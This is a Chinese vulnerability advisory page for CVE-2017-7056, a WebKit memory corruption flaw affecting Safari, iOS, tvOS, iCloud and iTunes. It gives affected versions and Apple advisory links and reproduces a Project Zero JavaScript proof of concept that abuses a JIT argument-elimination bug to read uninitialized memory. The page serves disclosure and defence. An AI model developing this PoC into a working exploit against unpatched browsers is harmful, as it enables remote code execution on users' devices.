多款Apple产品WebKit 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124124 漏洞类型 缓冲区溢出
发布时间 2017-07-25 更新时间 2017-07-25
CVE编号 CVE-2017-7056 CNNVD-ID CNNVD-201707-954
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/42376
https://cxsecurity.com/issue/WLB-2017070165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201707-954
|漏洞详情
AppleiOS、iCloudforWindows、iTunesforWindows、Safari和tvOS都是美国苹果(Apple)公司的产品。AppleiOS是一套为专移动设备所开发的一套操作系统;Safari是一款Web浏览器,是MacOSX和iOS操作系统附带的默认浏览器。WebKit是KDE社区开发的一套开源Web浏览器引擎,目前被AppleSafari及GoogleChrome等浏览器使用。多款Apple产品中的WebKit组件中存在内存损坏漏洞。远程攻击者可借助特制的网站利用该漏洞执行任意代码或造成拒绝服务(内存损坏和应用程序崩溃)。以下产品和版本受到影响:AppleSafari10.1.2之前的版本;tvOS10.2.2之前的版本;iOS10.3.3之前的版本;基于Windows平台的iCloud6.2.2之前的版本;基于Window平台的iTunes12.6.2之前的版本。
|漏洞EXP
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262

Here is a snippet of ArgumentsEliminationPhase::transform
    case LoadVarargs:
        ...
        if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {
            ...
            if (argumentCountIncludingThis <= varargsData->limit) {
                storeArgumentCountIncludingThis(argumentCountIncludingThis);
                // store arguments
                ...
            }

            node->remove();
            node->origin.exitOK = canExit;
            break;
        }

Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.

PoC:
-->

const kArgsLength = 0x101;

let buggy = null;
function inlineFunc() {
    if (arguments.length != kArgsLength) {
        buggy = arguments;
    }
}

class ClassForInine extends inlineFunc {
}

function sleep(ms) {
    let start = new Date();
    while (new Date() - start < ms);
}

function main() {
    let args = new Array(kArgsLength);
    args.fill(333 + 1);
    args = args.join(', ');

    let opt = new Function(`(() => {
        new ClassForInine(${args});
    })();`);

    for (let i = 0; i < 0x100000; i++) {
        opt();

        if (i === 0x3000)
            sleep(1000);

        if (buggy) {
            print('buggy.length: ' + buggy.length);
            break;
        }
    }

    for (let i = 0, n = buggy.length; i < n; i++) {
        print(buggy[i]);
    }
}

main();
|参考资料

来源:CONFIRM
链接:https://support.apple.com/HT207921
来源:CONFIRM
链接:https://support.apple.com/HT207923
来源:CONFIRM
链接:https://support.apple.com/HT207924
来源:CONFIRM
链接:https://support.apple.com/HT207927
来源:CONFIRM
链接:https://support.apple.com/HT207928